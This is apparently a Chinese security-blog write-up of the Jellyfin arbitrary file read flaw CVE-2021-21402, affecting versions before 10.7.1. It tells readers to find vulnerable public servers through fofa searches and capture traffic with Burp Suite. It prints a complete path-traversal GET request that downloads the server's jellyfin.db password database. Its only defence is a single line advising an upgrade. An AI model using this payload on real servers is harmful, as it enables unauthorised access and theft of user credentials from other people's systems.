Jellyfin任意文件读取CVE-2021-21402漏洞验证

一、漏洞描述

Jellyfin是一个自由软件媒体系统，在10.7.1版之前的Jellyfin中，攻击者可以通过精心构造的请求读取Jellyfin服务器端的任意文件，当使用Windows主机作为操作系统时，此问题将变得跟加普遍，该漏洞已在10.7.1版本中修复。

二、影响版本

Jellyfin<10.7.1

三、漏洞验证

1.根据关键词在fofa上搜索包含该漏洞的网站

[出自:jiwo.org]

2.访问网站用burpsuite抓包

3.构造URL请求头  jellyfin.db将从服务器下载带有密码的数据库：

POC：GET /Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/ HTTP/1.1

完整请求包

GET/Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/ HTTP/1.1

Host: xx.xx.xx.xx

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

If-Modified-Since: Mon, 31 Aug 2020 11:47:34 GMT

Connection: close

四、安全建议

升级Jellyfin到10.7.1版本